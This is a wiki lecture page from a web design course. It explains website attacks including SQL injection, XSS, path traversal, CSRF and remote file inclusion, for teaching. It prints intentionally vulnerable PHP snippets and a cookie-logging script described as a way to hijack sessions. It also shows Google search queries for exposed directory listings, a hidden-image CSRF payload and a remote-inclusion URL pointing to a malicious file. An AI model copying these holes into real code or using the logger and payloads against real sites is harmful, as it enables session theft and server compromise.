Recent Changes - Search:

Web Design

This website demonstrates using wikis as teaching and learning tool.

The course instructor is happy to share the teaching materials here with those who find it readable.

Lecture /

Website Security

A Web Design Lecture by Steven Choy

Overview: SQL Injection - Cross Site Scripting (XSS) - Path Traversal - Cross-Site Request Forgery - Remote File Inclusion (RFI)

Introduction

"Website security is an interesting topic and should be high on the radar of anyone who has a Web presence under their control. Ineffective Web security leads to all of the things that make us hate the Web: spam, viruses, identity theft, to name a few."

SQL Injection

  • Description
"SQL Injection involves entering SQL code into web forms or into the browser address field to access and manipulate the database behind the site, system or application."
"It is a trick to inject SQL query/command as an input possibly via web pages. Many web pages take parameters from web user, and make SQL query to the database. Take for instance when a user login, web page that user name and password and make SQL query to the database to check if a user has valid name and password. With SQL Injection, it is possible for us to send crafted user name and/or password field that will change the SQL query and thus grant us something else."
  • How is it possible?
The program in the server takes users' input without precaution. The users' input is then used as a part of the SQL query to be executed.
  • Examples
SQL Injection Attacks by Examples

Cross Site Scripting (XSS)

  • Description
"XSS is about malicious (usually) JavaScript routines embedded in hyperlinks, which are used to hijack sessions, hijack ads in applications and steal personal information."
  • How is it possible?
The program in the server takes users' input without precaution. The users' input is then used as part of the HTML code.
  • Example (with class demonstration):
Step 1: Find XSS hole 
      <?php
        $color = 'white';
        $background = 'black';
        if(isset($_GET['color'])){
          $color = $_GET['color'];
        }
        if(isset($_GET['background'])){
          $background = $_GET['background'];
        }
      ?>

      <style type="text/css" media="screen">
        #intro{
          color:<?php echo $color; ?>;
          background:<?php echo $background;?>;
          font-family:helvetica,arial,sans-serif;
          font-size:200%;
          padding:10px;
        }
      </style>

      <p id="intro">Cool intro block, customizable, too!</p>
Step 2: Prepare some program to hijack sessions or steal personal information. 
		$ip=$_SERVER['REMOTE_ADDR'];
		$value = $_GET['cookie'];
		$time = date("F j, Y, g:i a");
		$myFile = "record20110218.txt";
		$fh = fopen($myFile, 'a');
		fwrite($fh, $time." - ".$ip." - ".$value."\n");
		fclose($fh);
Step 3: Inject Javascript and embed in hyperlink.
Step 4: When a user clicks the hyperlink, the JavaScript will send some information to the program that was previously prepared.
  • More example:
XSS Video (10 minutes)

Path Traversal

  • Description
"Allowing for path or directory traversal on your server is an amazingly bad idea. You would be allowing people to list the folders on your server and to navigate from folder to folder. This allows attackers to go to folders with sensitive information or website functionality and have some fun."
  • How is it possible?
In the root directory of a website, many folders are used to store website contents. When there is not index.html (or index.php, etc.) in a folder, the contents of that folder can be viewed by public users.
  • Example: try the following goolge searches 
      "index of /photos"

      intitle:index.of mp3 -html -htm -php -asp -txt -pls

      "index of"  Last modified site:.hk

Cross-Site Request Forgery (CSRF)

  • Description
"Cross-site request forgery (CSRF) exploits browsers and websites that allow for functionality to be called without really knowing that an actual user initiated it."
"CSRF becomes even more dangerous when you are logged into and authenticated by a particular system. An image in any other tab in your browser could execute a money transfer, read your emails and send them on and many other evil things."
  • How is it possible?
The program in the server does not check if an HTTP request is sent from the original site.
  • Example: 
      <h1>Hello! This is CSRF testing</h1>
      <img src="http://example.com/csrf.php?id=xxyyzz" width="1" height="1">
      <p>Please view the source code to see the evil embedded!</p>
Anybody coming to the above webpage would now be putting another vote into your database. I could use an image or CSS link or script or anything that allows for a URI to be defined and loaded by a browser when the HTML renders. In CSS, this could be a background image.

Remote File Inclusion (RFI)

  • Description
"Remote file inclusion, or RFI, involves an attack from a remote location that exploits a vulnerable application and injects malicious code for the purpose of spamming or even gaining access to the root folder of the server."
"With Remote file inclusion or code injection, an attacker uses a flaw in your website to inject code from another server to run on yours."
"Remote File Inclusion (RFI) is a type of vulnerability most often found on websites, it allows an attacker to include a remote file usually through a script on the web server. The vulnerability occurs due to the use of user supplied input without proper validation." (from Wikipedia)
  • How is it possible?
The program in the server takes users' input as a parameter to select another file in the website to include. However, that program does not take any precaution.
  • General example:
    "Imagine that at http://example.com/malice.php a file exists and our script is located at http://site.com/index.php. The attacker will do this request: http://site.com/index.php?page=http://example.com/malice. This file will get executed when it is included and it will a write a new file to the disk."
  • Example: 
    <?php
      $lang = 'en';
      if (isset( $_GET['LANG'] ) )
      $lang = $_GET['LANG'];
      require( $lang . '.php' );
    ?>

    <form method="get">
    <select name="LANG">
    <option value="en">English</option>
    <option value="zh">Chinese</option>
    </select>
    <input type="submit">
    </form>

Other common security vulnerabilities

  • Authorization Bypass
Video - This is an example of how easy it is to bypass client-side security checks and hack your way in.
  • Error Reporting
"Error reporting is a great tool for diagnosing bugs and allowing you to fix them quicker and easier, but it also poses a potential security threat. The problem occurs when the error is visible to others on-screen, because it reveals possible security holes in your source code that a hacker can easily take advantage of."
  • Register_Globals
"Register_Globals makes writing PHP applications simple and convenient for the developer, but it also poses a potential security risk. When turned on, it allows unverified users to inject variables into an application to gain administrative access to your website."
Example code: 
	// define $authorized = true only if user is authenticated
	if (authenticated_user()) {
		$authorized = true;
	}

	// Because we didn't first initialize $authorized as false, this might be
	// defined through register_globals, like from GET auth.php?authorized=1
	// So, anyone can be seen as authenticated!
	if ($authorized) {
		include "/highly/sensitive/data.php";
	}

References:

Thanks for Reading

If you would rather like to have this lecture note in printed format, please click the print action link in the top right corner.

If you find any problem in this lecture note, please feel free to tell Steven via steven [at] findaway.hk.

Edit - History - Print - Recent Changes - Search
Page last modified on February 17, 2011, at 10:06 AM